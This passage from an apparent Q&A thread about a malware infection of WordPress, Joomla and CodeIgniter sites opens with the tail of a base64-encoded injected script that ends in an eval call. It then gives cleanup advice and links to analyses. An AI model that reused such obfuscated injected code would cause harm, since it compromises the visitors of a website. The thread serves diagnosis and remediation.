BMIE0gTiBPIFAgUSBSIFMgVCBVIFYgVyBYIFkgWiBbIF0gXiBfIGAgYSBkIGUgZiBnIGggaiBrJy5zdWJzdHIoYy09KHg9YzwyPzE6MikseCkpKS5qb2luKHQucG9wKCkpKTtldmFsKGQpPC9zY3JpcHQ+');}
```

It seems that this virus/malware is affecting several CMS such as Joomla, Wordpress, CodeIgniter, etc. Some more info [here](http://sucuri.net/malware/malware-injection-jtoolsmini-js) and [here](http://sucuri.net/malware-injection-sidename-js.html).

Comment: Yes, I deleted that string in all my index files

Comment: My `google_verify.php` looks a bit different. There is also no `jtoolsmini.js`. Do you know where this vulnerability is coming from?

Answer (score 1):

Best course of action:

- change ALL ftp and username passwords QUICKLY
- uninstall all FTP program(s) on your pc
- run virus scan & malware scan
- make sure your pc is clean
- reinstall FTP client (clean install - download new version of software)

now to clean your WP website.
- install WP plugins (tac, exploit scanner)
- run plugins
- note infected files
- use FTP or WP plugin editor to clean these files
- run exploit scanner & tac till website is clean

Hope this helps...